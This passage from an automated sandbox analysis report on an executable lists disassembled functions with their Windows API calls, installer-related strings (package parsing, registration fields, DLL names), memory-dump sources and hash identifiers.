Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: CompareStringlstrlen
String ID: burn.clean.room
API String ID: 1433953587-3055529264
Opcode ID: 6d53bdbe34f0b965d3f445370e177258952e58ff49034831ab1ac0d09c93e076
Instruction ID: 13145b6fd6fbc77895b1cdfa3677cdb9b2bca679d9ca1bc85f6fa71bd87d23e7
Opcode Fuzzy Hash: 6d53bdbe34f0b965d3f445370e177258952e58ff49034831ab1ac0d09c93e076
Instruction Fuzzy Hash: EF0186B2500524AF9B314B989D84E73BFADF725760B104117F989C3620E3749C69F7A2

Function 005D6920 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(00000000), ref: 005D6985

Strings

atomutil.cpp, xrefs: 005D6941
`Dv, xrefs: 005D6985

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: FreeString
String ID: `Dv$atomutil.cpp
API String ID: 3341692771-1153537316
Opcode ID: cbfba5e159b752b263f9fdf2b59fe47d11f359c163c1e998bb32c2a920f811d8
Instruction ID: a1e345c976536ee4ae19a2428c375c6e90b39fda81004993a394715e167f2819
Opcode Fuzzy Hash: cbfba5e159b752b263f9fdf2b59fe47d11f359c163c1e998bb32c2a920f811d8
Instruction Fuzzy Hash: 0F01D132800119FBCB315B9C9C19BAEFF79BB84B60F240157F90066350C7769E02E6E6

Function 00596522 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?), ref: 00596534

Part of subcall function 005D0ACC: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,?,00595EB2,00000000), ref: 005D0AE0
Part of subcall function 005D0ACC: GetProcAddress.KERNEL32(00000000), ref: 005D0AE7
Part of subcall function 005D0ACC: GetLastError.KERNEL32(?,?,?,00595EB2,00000000), ref: 005D0AFE

Part of subcall function 00595CE2: RegCloseKey.ADVAPI32(00000000,?,00000000,CommonFilesDir,?,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion,00020119,00000000), ref: 00595D68

Strings

Failed to get 64-bit folder., xrefs: 00596557
Failed to set variant value., xrefs: 00596571

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: AddressCloseCurrentErrorHandleLastModuleProcProcess
String ID: Failed to get 64-bit folder.$Failed to set variant value.
API String ID: 3109562764-2681622189
Opcode ID: 6834fc14a5602dcfaa9577c977c78d966f3f17fad93aea4add2e2ebcbd9abafa
Instruction ID: cbfda427609e8717fa75fbd8b82068a140104ab4220d1076697184dfe764bb8c
Opcode Fuzzy Hash: 6834fc14a5602dcfaa9577c977c78d966f3f17fad93aea4add2e2ebcbd9abafa
Instruction Fuzzy Hash: D9018F32C01229BBCF21AB94CD0AA9E7F38BB00720F954157B800A6144EA319F54E691

Function 005933C7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,?,00000104,?,?,?,?,005910DD,?,00000000), ref: 005933E8
GetLastError.KERNEL32(?,?,?,?,005910DD,?,00000000), ref: 005933FF

Strings

pathutil.cpp, xrefs: 00593423

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: ErrorFileLastModuleName
String ID: pathutil.cpp
API String ID: 2776309574-741606033
Opcode ID: 6ba202f665d89c06c2cf64ea53f3bd69df76a436db4a2ce7a681d01f603e2544
Instruction ID: 6bf993229b98d9b43e44cd103cf7020dbe1a24157e173844766b40206c611dab
Opcode Fuzzy Hash: 6ba202f665d89c06c2cf64ea53f3bd69df76a436db4a2ce7a681d01f603e2544
Instruction Fuzzy Hash: 88F0C273A41531E79F3256969C4DA8BEE59FB95BB0B130522FD08BB200DA60DD0092E0

Function 005BE30F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 005BEBD2

Part of subcall function 005C1380: RaiseException.KERNEL32(?,?,?,005BEBF4,?,00000000,00000000,?,?,?,?,?,005BEBF4,?,005F7EC8), ref: 005C13DF

__CxxThrowException@8.LIBVCRUNTIME ref: 005BEBEF

Strings

Unknown exception, xrefs: 005BEBFC

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: Exception@8Throw$ExceptionRaise
String ID: Unknown exception
API String ID: 3476068407-410509341
Opcode ID: fb5a92c6ca464e6361d28874280f168d3306b809c497d2a79068006d10ea890c
Instruction ID: df2c38cd8492ea06e3bde3302af94a88624e5d39d40f6e1951fde64e74cce505
Opcode Fuzzy Hash: fb5a92c6ca464e6361d28874280f168d3306b809c497d2a79068006d10ea890c
Instruction Fuzzy Hash: CEF0A43490020E6ACB00BAA4DC5BEE97F6CBE40350B584965F91592492EB34FD158581

Function 005D4A05 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40COMMON

Download Yara Rule

APIs

GetFileSizeEx.KERNEL32(00000000,00000000,00000000,762334C0,?,?,?,0059BA1D,?,?,?,00000000,00000000), ref: 005D4A1D
GetLastError.KERNEL32(?,?,?,0059BA1D,?,?,?,00000000,00000000,?,?,?,00000000,7736C3F0,00000000), ref: 005D4A27

Strings

fileutil.cpp, xrefs: 005D4A4B

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: ErrorFileLastSize
String ID: fileutil.cpp
API String ID: 464720113-2967768451
Opcode ID: 665404b63771e735218a156031f4e7c48079b72561044b647089de630ca847f6
Instruction ID: 205f745f50da229a79add61da39ef72be781a6fe01b99a1d03d8a48e6d5b7881
Opcode Fuzzy Hash: 665404b63771e735218a156031f4e7c48079b72561044b647089de630ca847f6
Instruction Fuzzy Hash: A1F0A47794113AAB97208F89890995AFFADFF14B60B014117FD44A7300E770AD009BD4

Function 005D0E07 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(RegDeleteKeyExW,AdvApi32.dll), ref: 005D0E28

Strings

AdvApi32.dll, xrefs: 005D0E0D
RegDeleteKeyExW, xrefs: 005D0E1D

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: AddressProc
String ID: AdvApi32.dll$RegDeleteKeyExW
API String ID: 190572456-850864035
Opcode ID: 59dbd54cf39d2b06634c46aa14f18e5dc407097c656013072f973ec710c3efbf
Instruction ID: 0cb3261adfde56b796995f85bab4bfccce6a3d45339ba7a6a8cc3b18614059e2
Opcode Fuzzy Hash: 59dbd54cf39d2b06634c46aa14f18e5dc407097c656013072f973ec710c3efbf
Instruction Fuzzy Hash: 58E0EC71542225DAEB615B14FC09B627F91F730758F014626E504DA2B0D3BA8848EB90

Analysis Process: UolJwovI8c.exePID: 4876, Parent PID: 4364COMMON

Executed Functions

Function 00511070 Relevance: 19.3, APIs: 2, Strings: 9, Instructions: 78fileCOMMON

Download Yara Rule

APIs

Part of subcall function 005133C7: GetModuleFileNameW.KERNEL32(?,?,00000104,?,00000104,?,?,?,?,005110DD,?,00000000), ref: 005133E8

CreateFileW.KERNELBASE(?,80000000,00000005,00000000,00000003,00000080,00000000,?,00000000), ref: 005110F6

Part of subcall function 00511175: HeapSetInformation.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,0051111A,cabinet.dll,00000009,?,?,00000000), ref: 00511186
Part of subcall function 00511175: GetModuleHandleW.KERNEL32(kernel32,?,?,?,?,?,0051111A,cabinet.dll,00000009,?,?,00000000), ref: 00511191
Part of subcall function 00511175: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 0051119F
Part of subcall function 00511175: GetLastError.KERNEL32(?,?,?,?,?,0051111A,cabinet.dll,00000009,?,?,00000000), ref: 005111BA
Part of subcall function 00511175: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 005111C2
Part of subcall function 00511175: GetLastError.KERNEL32(?,?,?,?,?,0051111A,cabinet.dll,00000009,?,?,00000000), ref: 005111D7

CloseHandle.KERNEL32(?,?,?,?,0055B4D0,?,cabinet.dll,00000009,?,?,00000000), ref: 00511131

Strings

feclient.dll, xrefs: 005110D1
msi.dll, xrefs: 005110A0
wininet.dll, xrefs: 005110AE
crypt32.dll, xrefs: 005110CA
clbcatq.dll, xrefs: 005110BC
msasn1.dll, xrefs: 005110C3
cabinet.dll, xrefs: 00511099, 00511114
comres.dll, xrefs: 005110B5
version.dll, xrefs: 005110A7

Memory Dump Source

Source File: 00000002.00000002.2268773940.0000000000511000.00000020.00000001.01000000.00000005.sdmp, Offset: 00510000, based on PE: true

Associated: 00000002.00000002.2268758136.0000000000510000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268802426.000000000055B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268823426.000000000057A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268838692.000000000057D000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_510000_UolJwovI8c.jbxd

Similarity

API ID: AddressErrorFileHandleLastModuleProc$CloseCreateHeapInformationName
String ID: cabinet.dll$clbcatq.dll$comres.dll$crypt32.dll$feclient.dll$msasn1.dll$msi.dll$version.dll$wininet.dll
API String ID: 3687706282-3151496603
Opcode ID: 2a195b6a6da68f7ea8d4b38a0f1404d808d10f698814a7494fb63a2bb91c09b3
Instruction ID: 40f6a48032e3285aa72b87f337615a682088febc3aa09263159e9afa8f5c3d3c
Opcode Fuzzy Hash: 2a195b6a6da68f7ea8d4b38a0f1404d808d10f698814a7494fb63a2bb91c09b3
Instruction Fuzzy Hash: 93217C7190021DABEB209FA4CC1DBEEBFF9BB49711F504156EA10B7291E7705948CBA4

Function 0054FEC6 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 132threadtimeCOMMONLIBRARYCODE

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(0057B5FC,00000000,?,?,?,?,0052E93B,8000FFFF,Unexpected return value from message pump.), ref: 0054FEF4
GetCurrentProcessId.KERNEL32(00000000,?,0052E93B,8000FFFF,Unexpected return value from message pump.), ref: 0054FF04
GetCurrentThreadId.KERNEL32 ref: 0054FF0D
GetLocalTime.KERNEL32(8000FFFF,?,0052E93B,8000FFFF,Unexpected return value from message pump.), ref: 0054FF23
LeaveCriticalSection.KERNEL32(0057B5FC,0052E93B,?,00000000,0000FDE9,?,0052E93B,8000FFFF,Unexpected return value from message pump.), ref: 0055001A

Strings

0eW, xrefs: 0054FF70
$eW, xrefs: 0054FF61
(eW, xrefs: 0054FF5A
%ls[%04X:%04X][%04hu-%02hu-%02huT%02hu:%02hu:%02hu]%hs%03d:%ls %ls%ls, xrefs: 0054FFC0
,eW, xrefs: 0054FF53

Memory Dump Source

Source File: 00000002.00000002.2268773940.0000000000511000.00000020.00000001.01000000.00000005.sdmp, Offset: 00510000, based on PE: true

Associated: 00000002.00000002.2268758136.0000000000510000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268802426.000000000055B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268823426.000000000057A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268838692.000000000057D000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_510000_UolJwovI8c.jbxd

Similarity

API ID: CriticalCurrentSection$EnterLeaveLocalProcessThreadTime
String ID: $eW$%ls[%04X:%04X][%04hu-%02hu-%02huT%02hu:%02hu:%02hu]%hs%03d:%ls %ls%ls$(eW$,eW$0eW
API String ID: 296830338-93871445
Opcode ID: ac511a91f504c6ad534068c74277ab4153b28587756b7207da98211aa6857ec7
Instruction ID: 61fe8961fe05cf4f0f1f1925e003589b2087ccf71fe3b90512c13d828cb32729
Opcode Fuzzy Hash: ac511a91f504c6ad534068c74277ab4153b28587756b7207da98211aa6857ec7
Instruction Fuzzy Hash: 9D419571901219ABEF219FA4EC18BFE7FB4FB18716F004425F905A7190E7349D89EBA1

Function 0052A0BB Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 51COMMON

Download Yara Rule

Strings

Failed to copy working folder., xrefs: 0052A116
Failed create working folder., xrefs: 0052A0EE
Failed to calculate working folder to ensure it exists., xrefs: 0052A0D8

Memory Dump Source

Source File: 00000002.00000002.2268773940.0000000000511000.00000020.00000001.01000000.00000005.sdmp, Offset: 00510000, based on PE: true

Associated: 00000002.00000002.2268758136.0000000000510000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268802426.000000000055B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268823426.000000000057A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268838692.000000000057D000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_510000_UolJwovI8c.jbxd

Similarity

API ID: CurrentDirectoryErrorLastProcessWindows
String ID: Failed create working folder.$Failed to calculate working folder to ensure it exists.$Failed to copy working folder.
API String ID: 3841436932-2072961686
Opcode ID: 76f12351ff03d82fed6075ddc61d1f40d952234a50d8a873d493069496ab15eb
Instruction ID: 2ed56a41e48098184c45bb59565d16ebef9d5175945e2c04cef61eeb7024ad25
Opcode Fuzzy Hash: 76f12351ff03d82fed6075ddc61d1f40d952234a50d8a873d493069496ab15eb
Instruction Fuzzy Hash: 9401D432901539FB8B229A54ED1AC9EBE79FF86B20B104256F80076250EB319E20F681

Function 0051DF33 Relevance: 128.4, APIs: 11, Strings: 62, Instructions: 646COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(00000000), ref: 0051E058
SysFreeString.OLEAUT32(00000000), ref: 0051E736

Part of subcall function 0051394F: GetProcessHeap.KERNEL32(?,?,?,00512274,?,00000001,7694B390,8000FFFF,?,?,00550267,?,?,00000000,00000000,8000FFFF), ref: 00513960
Part of subcall function 0051394F: RtlAllocateHeap.NTDLL(00000000,?,00512274,?,00000001,7694B390,8000FFFF,?,?,00550267,?,?,00000000,00000000,8000FFFF), ref: 00513967

Strings

Failed to parse MSU package., xrefs: 0051E53B
RollbackBoundary, xrefs: 0051DF56
Invalid cache type: %ls, xrefs: 0051E6EA
Failed to get @InstallSize., xrefs: 0051E6CD
Failed to parse EXE package., xrefs: 0051E389
InstallSize, xrefs: 0051E1FF
Failed to allocate memory for rollback boundary structs., xrefs: 0051DFCA
Failed to select package nodes., xrefs: 0051E094
`Dv, xrefs: 0051E058, 0051E47B, 0051E736
Failed to get @Id., xrefs: 0051E701
LogPathVariable, xrefs: 0051E276
Cache, xrefs: 0051E14B
Failed to allocate memory for patch sequence information to package lookup., xrefs: 0051E570
Failed to find backward transaction boundary: %ls, xrefs: 0051E51D
CacheId, xrefs: 0051E1C9
Failed to get @CacheId., xrefs: 0051E6DB
InstallCondition, xrefs: 0051E2BC
msi.dll, xrefs: 0051E1C8
Failed to get rollback bundary node count., xrefs: 0051DF8E
Failed to parse payload references., xrefs: 0051E6B1
MsuPackage, xrefs: 0051E406
yes, xrefs: 0051E187
Failed to get @LogPathVariable., xrefs: 0051E4E5
always, xrefs: 0051E1A7
Failed to get @Permanent., xrefs: 0051E6BF
Failed to get @Vital., xrefs: 0051E6B8
Failed to parse target product codes., xrefs: 0051E69B
Failed to get @InstallCondition., xrefs: 0051E4F9
RollbackBoundaryBackward, xrefs: 0051E319
Failed to parse MSI package., xrefs: 0051E3C1
Size, xrefs: 0051E1E4
Failed to select rollback boundary nodes., xrefs: 0051DF69
feclient.dll, xrefs: 0051E298
Failed to get @PerMachine., xrefs: 0051E6C6
RollbackLogPathVariable, xrefs: 0051E299
clbcatq.dll, xrefs: 0051E219
PerMachine, xrefs: 0051E21A
Failed to parse dependency providers., xrefs: 0051E6AA
Failed to find forward transaction boundary: %ls, xrefs: 0051E506
Vital, xrefs: 0051E027, 0051E25B
ExePackage, xrefs: 0051E357
Permanent, xrefs: 0051E235
Failed to get package node count., xrefs: 0051E0B1
ETQ, xrefs: 0051DF33
Chain/ExePackage|Chain/MsiPackage|Chain/MspPackage|Chain/MsuPackage, xrefs: 0051E081
wininet.dll, xrefs: 0051E25A
crypt32.dll, xrefs: 0051E2BB
Failed to get @RollbackBoundaryForward., xrefs: 0051E510
Failed to get @RollbackLogPathVariable., xrefs: 0051E4EF
MsiPackage, xrefs: 0051E395
comres.dll, xrefs: 0051E234
Failed to parse MSP package., xrefs: 0051E531
Failed to get @Size., xrefs: 0051E6D4
Failed to get @RollbackBoundaryBackward., xrefs: 0051E527
Failed to allocate memory for package structs., xrefs: 0051E0EF
Failed to get next node., xrefs: 0051E708
RollbackBoundaryForward, xrefs: 0051E2DF
MspPackage, xrefs: 0051E3CD
package.cpp, xrefs: 0051DFBE, 0051E0E3, 0051E4CF, 0051E564
cabinet.dll, xrefs: 0051E1FE
Failed to allocate memory for MSP patch sequence information., xrefs: 0051E4DB
Failed to get @Cache., xrefs: 0051E6FA

Memory Dump Source

Source File: 00000002.00000002.2268773940.0000000000511000.00000020.00000001.01000000.00000005.sdmp, Offset: 00510000, based on PE: true

Associated: 00000002.00000002.2268758136.0000000000510000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268802426.000000000055B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268823426.000000000057A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268838692.000000000057D000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_510000_UolJwovI8c.jbxd

Similarity

API ID: FreeHeapString$AllocateProcess
String ID: Cache$CacheId$Chain/ExePackage|Chain/MsiPackage|Chain/MspPackage|Chain/MsuPackage$ETQ$ExePackage$Failed to allocate memory for MSP patch sequence information.$Failed to allocate memory for package structs.$Failed to allocate memory for patch sequence information to package lookup.$Failed to allocate memory for rollback boundary structs.$Failed to find backward transaction boundary: %ls$Failed to find forward transaction boundary: %ls$Failed to get @Cache.$Failed to get @CacheId.$Failed to get @Id.$Failed to get @InstallCondition.$Failed to get @InstallSize.$Failed to get @LogPathVariable.$Failed to get @PerMachine.$Failed to get @Permanent.$Failed to get @RollbackBoundaryBackward.$Failed to get @RollbackBoundaryForward.$Failed to get @RollbackLogPathVariable.$Failed to get @Size.$Failed to get @Vital.$Failed to get next node.$Failed to get package node count.$Failed to get rollback bundary node count.$Failed to parse EXE package.$Failed to parse MSI package.$Failed to parse MSP package.$Failed to parse MSU package.$Failed to parse dependency providers.$Failed to parse payload references.$Failed to parse target product codes.$Failed to select package nodes.$Failed to select rollback boundary nodes.$InstallCondition$InstallSize$Invalid cache type: %ls$LogPathVariable$MsiPackage$MspPackage$MsuPackage$PerMachine$Permanent$RollbackBoundary$RollbackBoundaryBackward$RollbackBoundaryForward$RollbackLogPathVariable$Size$Vital$`Dv$always$cabinet.dll$clbcatq.dll$comres.dll$crypt32.dll$feclient.dll$msi.dll$package.cpp$wininet.dll$yes
API String ID: 336948655-1802205494
Opcode ID: d6e207a97db490d533cc41ac369323fb5914d24020c71639fe71af6345f59475
Instruction ID: 2259f7e31f46f8e3d71d5ecd0c8f75664b7792ec3012c1141839a00c946b9037
Opcode Fuzzy Hash: d6e207a97db490d533cc41ac369323fb5914d24020c71639fe71af6345f59475
Instruction Fuzzy Hash: 9832B031D40226ABEB119B54CC47FEEBEB4BB54721F214665ED11BB2D0D7B0AD80DB90

Function 0051F9E3 Relevance: 117.7, APIs: 3, Strings: 64, Instructions: 446
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Failed to get @Version., xrefs: 0051FAA4
Failed to get @Tag., xrefs: 0051FA6A
Failed to get @DisplayVersion., xrefs: 0051FBBA
Failed to get @DisplayName., xrefs: 0051FB95
Failed to parse related bundles, xrefs: 0051FA83
Failed to get @Department., xrefs: 0051FE8E
Classification, xrefs: 0051FEE2
Failed to get @ProductFamily., xrefs: 0051FEB3
Failed to get @Name., xrefs: 0051FED4
Publisher, xrefs: 0051FBC8
Failed to get @Id., xrefs: 0051FA49
Failed to get @Contact., xrefs: 0051FCE8
HelpTelephone, xrefs: 0051FC12
Department, xrefs: 0051FE77
Failed to get @Register., xrefs: 0051FB70
DisableModify, xrefs: 0051FCF6
Failed to get @DisableRemove., xrefs: 0051FDE0
Failed to get @DisableModify., xrefs: 0051FDB8
yes, xrefs: 0051FD36
UpdateUrl, xrefs: 0051FC5C
DisableRemove, xrefs: 0051FDC9
DisplayVersion, xrefs: 0051FBA3
registration.cpp, xrefs: 0051FD87
Failed to set registration paths., xrefs: 0051FF08
Failed to parse software tag., xrefs: 0051FE10
Failed to get @ExecutableName., xrefs: 0051FB07
Failed to get @ProviderKey., xrefs: 0051FAE6
Contact, xrefs: 0051FCD1
Failed to get @HelpLink., xrefs: 0051FC04
Failed to get @HelpTelephone., xrefs: 0051FC29
Failed to get @PerMachine., xrefs: 0051FB25
ProductFamily, xrefs: 0051FE9C
Manufacturer, xrefs: 0051FE53
ParentDisplayName, xrefs: 0051FC81
AboutUrl, xrefs: 0051FC37
Failed to get @AboutUrl., xrefs: 0051FC4E
Registration, xrefs: 0051F9FD
clbcatq.dll, xrefs: 0051FA56
Failed to get @Publisher., xrefs: 0051FBDF
PerMachine, xrefs: 0051FB12
Failed to get @Classification., xrefs: 0051FEF5
Name, xrefs: 0051FEC1
Tag, xrefs: 0051FA57
Failed to get @UpdateUrl., xrefs: 0051FC73
Comments, xrefs: 0051FCA9
HelpLink, xrefs: 0051FBED
Failed to select registration node., xrefs: 0051FA1C
Failed to select ARP node., xrefs: 0051FB4F
Arp, xrefs: 0051FB33
ExecutableName, xrefs: 0051FAF4
Invalid modify disabled type: %ls, xrefs: 0051FD94
ProviderKey, xrefs: 0051FAD3
Failed to get @Comments., xrefs: 0051FCC0
Failed to parse @Version: %ls, xrefs: 0051FAC5
ETQ, xrefs: 0051F9E3
DisplayName, xrefs: 0051FB7E
Failed to get @Manufacturer., xrefs: 0051FE66
Update, xrefs: 0051FE1E
msasn1.dll, xrefs: 0051FA35
Register, xrefs: 0051FB5D
Failed to select Update node., xrefs: 0051FE3C
button, xrefs: 0051FD15
Failed to get @ParentDisplayName., xrefs: 0051FC98
Version, xrefs: 0051FA91

Memory Dump Source

Source File: 00000002.00000002.2268773940.0000000000511000.00000020.00000001.01000000.00000005.sdmp, Offset: 00510000, based on PE: true

Associated: 00000002.00000002.2268758136.0000000000510000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268802426.000000000055B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268823426.000000000057A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268838692.000000000057D000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_510000_UolJwovI8c.jbxd

Similarity

API ID: StringVariant$AllocClearFreeInit
String ID: AboutUrl$Arp$Classification$Comments$Contact$Department$DisableModify$DisableRemove$DisplayName$DisplayVersion$ETQ$ExecutableName$Failed to get @AboutUrl.$Failed to get @Classification.$Failed to get @Comments.$Failed to get @Contact.$Failed to get @Department.$Failed to get @DisableModify.$Failed to get @DisableRemove.$Failed to get @DisplayName.$Failed to get @DisplayVersion.$Failed to get @ExecutableName.$Failed to get @HelpLink.$Failed to get @HelpTelephone.$Failed to get @Id.$Failed to get @Manufacturer.$Failed to get @Name.$Failed to get @ParentDisplayName.$Failed to get @PerMachine.$Failed to get @ProductFamily.$Failed to get @ProviderKey.$Failed to get @Publisher.$Failed to get @Register.$Failed to get @Tag.$Failed to get @UpdateUrl.$Failed to get @Version.$Failed to parse @Version: %ls$Failed to parse related bundles$Failed to parse software tag.$Failed to select ARP node.$Failed to select Update node.$Failed to select registration node.$Failed to set registration paths.$HelpLink$HelpTelephone$Invalid modify disabled type: %ls$Manufacturer$Name$ParentDisplayName$PerMachine$ProductFamily$ProviderKey$Publisher$Register$Registration$Tag$Update$UpdateUrl$Version$button$clbcatq.dll$msasn1.dll$registration.cpp$yes
API String ID: 760788290-2025526742
Opcode ID: 3ea211f3b86b044c9f2688ae227387616488018eedb9b287f83be0a53fcdf53e
Instruction ID: 5d1f557ebcc73d54610debbcc600cd02437ed88dd766bbf1a75162b4841fd907
Opcode Fuzzy Hash: 3ea211f3b86b044c9f2688ae227387616488018eedb9b287f83be0a53fcdf53e
Instruction Fuzzy Hash: 12E11836E44A36BBEB2196A0CC56EFEBE647B01710F150632FD11F7291CBA19D80A7C0

Function 0051B48B Relevance: 93.3, APIs: 24, Strings: 29, Instructions: 578
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(?,?,?,00000000,7736C3F0,00000000), ref: 0051B502
SetFilePointerEx.KERNELBASE(000000FF,00000000,00000000,00000000,00000000,?,?,?,00000000,7736C3F0,00000000), ref: 0051B550
GetLastError.KERNEL32(?,?,?,00000000,7736C3F0,00000000), ref: 0051B556
ReadFile.KERNELBASE(00000000,aDQH,00000040,?,00000000,?,?,?,00000000,7736C3F0,00000000), ref: 0051B59E
GetLastError.KERNEL32(?,?,?,00000000,7736C3F0,00000000), ref: 0051B5A4
SetFilePointerEx.KERNELBASE(00000000,00000000,?,00000000,00000000,?,?,?,00000000,7736C3F0,00000000), ref: 0051B601
GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,7736C3F0,00000000), ref: 0051B607
ReadFile.KERNELBASE(00000000,?,00000018,00000040,00000000,?,00000000,00000000,?,?,?,00000000,7736C3F0,00000000), ref: 0051B650
GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,7736C3F0,00000000), ref: 0051B656
